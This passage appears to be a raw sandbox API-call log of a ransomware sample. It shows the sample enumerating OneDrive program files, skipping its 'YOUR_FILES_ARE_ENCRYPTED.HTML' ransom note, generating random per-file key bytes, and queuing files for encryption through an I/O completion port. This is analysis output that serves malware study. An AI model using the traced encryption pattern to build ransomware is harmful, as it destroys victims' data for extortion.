RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0160.497] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="CD") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="44") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="A9") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B1") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="87") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="B8") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A7") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="43") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="1F") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="C5") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="34") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0C") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A9") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="21") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="29") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6F") returned 2 [0160.497] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="31") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="5E") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="66") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="D6") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="53") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="6A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="7A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="5A") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="01") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="46") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="68") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="8C") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="7C") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="30") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D8") returned 2 [0160.498] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="42") returned 2 [0160.499] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.Resources.dll" [0160.499] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.499] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0160.503] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3fe78d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3fe78d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3fe78d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x394a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0160.503] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll") returned 87 [0160.503] lstrcmpW (lpString1="FileSyncApi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.503] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0160.503] lstrlenW (lpString=".dll") returned 4 [0160.503] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0160.503] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0160.503] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=234664) returned 1 [0160.503] GetProcessHeap () returned 0x270000 [0160.503] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0160.508] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A2") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="86") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="EF") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BE") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="52") returned 2 [0160.508] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="24") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="65") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="4E") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="52") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="3F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5F") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F8") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="FC") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="E4") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="78") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CA") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="83") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="70") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0D") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="68") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="BE") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9D") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EF") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="DC") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="72") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="76") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="60") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="03") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="79") returned 2 [0160.509] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="9F") returned 2 [0160.510] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="32") returned 2 [0160.510] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll" [0160.510] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.510] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0160.511] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa40a5fb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa40a5fb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa40a5fb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x16e6a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0160.511] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll") returned 90 [0160.511] lstrcmpW (lpString1="FileSyncClient.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.511] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0160.511] lstrlenW (lpString=".dll") returned 4 [0160.511] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0160.511] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0160.512] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1500840) returned 1 [0160.512] GetProcessHeap () returned 0x270000 [0160.512] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0160.515] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A6") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7D") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="6D") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DC") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="19") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="25") returned 2 [0160.515] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8F") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="F6") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="91") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="85") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="EA") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="56") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="E9") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="3D") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="7E") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6A") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3B") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="42") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="26") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="7B") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D6") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="86") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="CF") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="93") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="39") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="69") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="96") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="B7") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F0") returned 2 [0160.516] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="9C") returned 2 [0160.517] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5A") returned 2 [0160.517] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7F") returned 2 [0160.517] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncClient.dll" [0160.517] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.517] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0160.517] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4164690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4164690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4164690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1b8a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0160.517] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncConfig.exe") returned 90 [0160.517] lstrcmpW (lpString1="FileSyncConfig.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.517] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0160.517] lstrlenW (lpString=".exe") returned 4 [0160.517] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0160.518] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa41b0950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa41b0950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa41b0950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12f0a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncSessions.dll", cAlternateFileName="FIFC38~1.DLL")) returned 1 [0160.518] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll") returned 92 [0160.518] lstrcmpW (lpString1="FileSyncSessions.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.518] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0160.518] lstrlenW (lpString=".dll") returned 4 [0160.518] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0160.518] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncsessions.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0160.518] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1241256) returned 1 [0160.518] GetProcessHeap () returned 0x270000 [0160.518] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0160.522] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="8E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="8C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="4E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="2C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="6E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="7E") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="95") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="49") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="E3") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="16") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="04") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="97") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BA") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="69") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="2B") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1C") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="D5") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="F8") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="42") returned 2 [0160.522] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="7F") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="3A") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="24") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="06") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="72") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CC") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="03") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="EF") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="5B") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6A") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="59") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="69") returned 2 [0160.523] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="30") returned 2 [0160.524] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncSessions.dll" [0160.524] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.524] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0160.524] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa426f030, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa426f030, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa426f030, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x506a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncShell.dll", cAlternateFileName="FI340C~1.DLL")) returned 1 [0160.524] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncShell.dll") returned 89 [0160.525] lstrcmpW (lpString1="FileSyncShell.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.525] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0160.525] lstrlenW (lpString=".dll") returned 4 [0160.525] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0160.525] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncShell.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncshell.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0160.525] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fr", cAlternateFileName="")) returned 1 [0160.525] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr") returned 74 [0160.525] GetProcessHeap () returned 0x270000 [0160.525] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.525] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr" [0160.525] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*" [0160.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8fcbb30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, 